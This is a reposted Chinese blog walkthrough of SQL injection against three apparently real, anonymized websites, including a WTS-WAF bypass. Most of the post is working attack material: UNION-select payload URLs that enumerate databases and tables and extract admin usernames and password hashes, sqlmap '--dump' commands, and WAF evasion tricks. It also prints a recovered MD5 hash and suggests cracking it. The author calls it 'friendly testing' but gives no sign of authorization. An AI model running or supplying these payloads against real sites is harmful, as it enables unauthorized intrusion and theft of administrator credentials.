1. Toy模板网首页
  2. > Toy博客

SQL注入三连实战绕过WTS-WAF

10月前 作者:gvpn 分类:Toy博客 阅读(40) 违法举报

这篇具有很好参考价值的文章主要介绍了SQL注入三连实战绕过WTS-WAF。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一键三连,sql注入

一次无意之间发现的sql注入,主要是因为有一个WTS-WAF,在此记录一下

只是友好测试,并非有意为之。。。。

牛刀小试1

手注

判断字段数

测试到order by 15的时候出现了报错,那么就可以说明字段数为14

http://www.xxx.com/xxx.php?id=22%20order%20by%2014

SQL注入三连实战绕过WTS-WAF

http://www.xxx.com/xxx.php?id=22%20order%20by%2015

SQL注入三连实战绕过WTS-WAF

直接注入

联合注入直接上

判断回显位置
http://www.xxx.com/xxx.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14

SQL注入三连实战绕过WTS-WAF

很多都可以,我这里直接用第二个位置

sql版本
http://www.xxx.com/xxx.php?id=-1%20union%20select%201,version(),3,4,5,6,7,8,9,10,11,12,13,14

SQL注入三连实战绕过WTS-WAF

当前数据库
http://www.xxx.com/xxx.php?id=-1%20union%20select%201,database(),3,4,5,6,7,8,9,10,11,12,13,14

SQL注入三连实战绕过WTS-WAF

当前数据库中的表
http://www.xxx.com/xxx.php?id=-1%20union%20select%201,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14%20from%20information_schema.tables%20where%20table_schema=database()

SQL注入三连实战绕过WTS-WAF

这里以表root为例:

爆字段
http://www.xxx.com/xxx.php?id=-1%20union%20select%201,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27root%27

SQL注入三连实战绕过WTS-WAF

查内容
http://www.xxx.com/xxx.php?id=-1%20union%20select%201,group_concat(id,0x7e,username,0x7e,password,0x7e,status),3,4,5,6,7,8,9,10,11,12,13,14%20from%20root

SQL注入三连实战绕过WTS-WAF

root
8c7f5189069036869a4910ff15831772

都是基础语法,连过滤都没有

sqlmap一把梭

在判断存在sql注入后,直接使用sqlmap一把梭

sqlmap -u "http://www.xxx.com/xxx.php?id=22" --batch --dbs

SQL注入三连实战绕过WTS-WAF

sqlmap -u "http://www.xxx.com/xxx.php?id=22" --batch -D svpy_com --tables

SQL注入三连实战绕过WTS-WAF

sqlmap -u "http://www.xxx.com/xxx.php?id=22" --batch -D svpy_com -T root --dump

SQL注入三连实战绕过WTS-WAF

牛刀小试2

步骤和上面差不多,直接测字段

测试回显
http://www.xxx.com/xxx.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26

SQL注入三连实战绕过WTS-WAF

数据库信息
http://www.xxx.com.xxx.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,database(),18,19,20,21,22,23,24,25,26

SQL注入三连实战绕过WTS-WAF

手注,sqlmap一把梭都可以

绕过WTS-WAF的SQL注入

测试字段
http://www.xxx.com/xxx.php?id=22%20order%20by%2021

SQL注入三连实战绕过WTS-WAF

报错

直接告诉了sql语句,添加注释符即可

并且在21的时候页面和正常页面差不多,但是到22的时候页面就发生了变化

http://www.xxx.com/xxx.php?id=22%20order%20by%2022--%20-

SQL注入三连实战绕过WTS-WAF

然后判断回显位置

http://www.xxx.com/xxx.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20-

被waf拦截

SQL注入三连实战绕过WTS-WAF

百度就可找到绕过方式

这里将空格替换为+即可

然后判断回显位置
http://www.xxx.com/xxx.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20-

SQL注入三连实战绕过WTS-WAF

在第七个位置

当前数据库
http://www.xxx.com/xxx.php?id=-1+union+select+1,2,3,4,5,6,database(),8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20-

版本
http://www.xxx.com/xxx.php?id=-1+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20-

SQL注入三连实战绕过WTS-WAF

在获取表的时候又被拦了

http://www.xxx.com/xxx.php?id=-1+union+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20information_schema.tables+where+table_schema=database()--%20-

SQL注入三连实战绕过WTS-WAF

看样子应该是group_concat()的原因,这里使用limit一个一个查看

http://www.xxx.com/xxx.php?id=-1+union+select+1,2,3,4,5,6,table_name,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20information_schema.tables+where+table_schema=database()+limit+0,1--%20-

SQL注入三连实战绕过WTS-WAF

bp抓包,给爆破一下

SQL注入三连实战绕过WTS-WAF

存在12个表

admin_authority,admin_login,admininfo,advanced,big_class,files,info,information,ip,message,sec_class,third_class

我在admin_login中并没有发现密码字段,于是选择admininfo表,并且发现了passwd字段

http://www.xxx.com/xxx.php?id=-1+union+select+1,2,3,4,5,6,column_name,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20information_schema.columns+where+table_name=%27admininfo%27+limit+0,1--%20-

bp爆破
username字段

SQL注入三连实战绕过WTS-WAF

passwd字段

SQL注入三连实战绕过WTS-WAF

查询username

ttp://www.xxx.com/xxx.php?id=-1+union+select+1,2,3,4,5,6,username,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+admininfo+limit+0,1--%20-

SQL注入三连实战绕过WTS-WAF

查询密码

http://www.xxx.com/xxx.php?id=-1+union+select+1,2,3,4,5,6,passwd,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+admininfo+limit+0,1--%20-

SQL注入三连实战绕过WTS-WAF

找个md5平台进行解密即可

这个网站主要的困难就是需要绕WAF,通常想这类的WAF在百度搜一搜都会有相关的绕过方式的。

如有错误和侵权,请联系删除!!!文章来源地址https://www.toymoban.com/news/detail-471857.html

到了这里,关于SQL注入三连实战绕过WTS-WAF的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

分享到:
领支付宝红包 赞助服务器费用

相关文章

  • WAF绕过漏洞利用——漏洞利用之注入上传跨站等绕过

    目录 前言: (一)SQL注入 0x01  sqlmap注入 修改user-agent头: (二)文件上传

    2024年02月12日
    浏览(42)

  • 【第二十三篇】Burpsuite+SQL注入实现登录绕过等(靶场实战案例)

    存在一个业务场景如下 筛选商品时,后端查询语句如下: 只有商品名匹配且该商品已发布(released=1),客户端才能回显数据。 点击Lifestyle时,页面回显 生活方式 有关商品,并可知参数以GET方

    2024年04月10日
    浏览(69)
  • 【WAF剖析】——SQL注入之安全狗bypass深度剖析

    【WAF剖析】——SQL注入之安全狗bypass深度剖析

    作者名:Demo不是emo  主页面链接:主页传送门 创作初心: 舞台再大,你不上台,永远是观众,没人会关心你努不努力,摔的痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷 座右铭: 不要让时代的悲哀成为你的悲哀 专研方向: 网络安全,数据结构 每日emo: 保持

    2024年02月03日
    浏览(37)
  • SQL注入---字符绕过

    SQL注入---字符绕过

    文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 当网页源代码中出现如下代码后,常见的注释符号将无效,因此需要通过特殊手段进行绕过 上述代码中无法使用符号(#)或(--+)将后面的sql语句注释,因此需要通过特殊手段将后面多出的单引号闭合

    2024年04月11日
    浏览(44)
  • 安全狗SQL注入绕过

    安全狗SQL注入绕过

    本文用sqli-labs第一关为例 一、简单注入 开启安全狗后尝试正常注入,发送请求后可以看到被安全狗拦截了 寻找被安全狗匹配的特征字符,这里没被拦截 原来是当and 与 xx=xx 同时出现的时候会被安全狗识别 1.1 简单注入绕过方式 这里可以使用mysql的内联注释来进行绕过 内联注

    2024年02月08日
    浏览(46)
  • SQL注入绕过安全狗

    SQL注入绕过安全狗

    如果程序中设置了过滤,但是程序只是对 and ,AND 或者 or,OR 设置了过滤,那么你就可以使用大小写过滤 例如 :and,or 当然不局限于 and,其它的例如 union 一些如果只是设置了过滤,没有进行深度过滤的话,都是可以使用大小写过滤的 union 设置了过滤

    2024年02月15日
    浏览(51)
  • 生命在于学习——SQL注入绕过

    生命在于学习——SQL注入绕过

    SQL注入绕过技术已经是一个老生常淡的内容了,防注入可以使用某些云waf加速乐等安全产品,这些产品会自带waf属性拦截和抵御SQL注入,也有一些产品会在服务器里安装软件,例如iis安全狗、d盾、还有就是在程序理论对输入参数进行过滤和拦截,例如360webscan脚本等只要参数

    2023年04月08日
    浏览(48)
  • sql注入(三)绕过方法及防御手段

    sql注入(三)绕过方法及防御手段

    常用的注释符有: 1)-- 注释内容 2)# 注释内容 3)/* 注释内容 */ 绕过方法 构造闭合: 这样接收源码前面的引号被 id=1\\\' 中的后引号所闭合,源码中的后引号会被 \\\'1\\\'=\\\'1 中的前引号所闭合所以这样不用注释符就逃逸出引号。 常用于 waf 的正则对大小写不敏感的情况。 当一些关

    2024年02月02日
    浏览(84)
  • Web安全之SQL注入绕过技巧

    Web安全之SQL注入绕过技巧

    两个空格代替一个空格,用Tab代替空格,%a0=空格:   最基本的绕过方法,用注释替换空格: 使用浮点数: 如果空格被过滤,括号没有被过滤,可以用括号绕过。 在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。而括号的两

    2024年02月07日
    浏览(44)
  • iwebsec靶场 SQL注入漏洞通关笔记11-16进制编码绕过

    iwebsec靶场 SQL注入漏洞通关笔记11-16进制编码绕过

    iwebsec靶场 SQL注入漏洞通关笔记1- 数字型注入_mooyuan的博客-CSDN博客 iwebsec靶场 SQL注入漏洞通关笔记2- 字符型注入(宽字节注入)_mooyuan的博客-CSDN博客 iwebsec靶场 SQL注入漏洞通关笔记3- bool注入(布尔型盲注)_mooyuan的博客-CSDN博客 iwebsec靶场 SQL注入漏洞通关笔记4- sleep注入(时

    2023年04月24日
    浏览(52)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包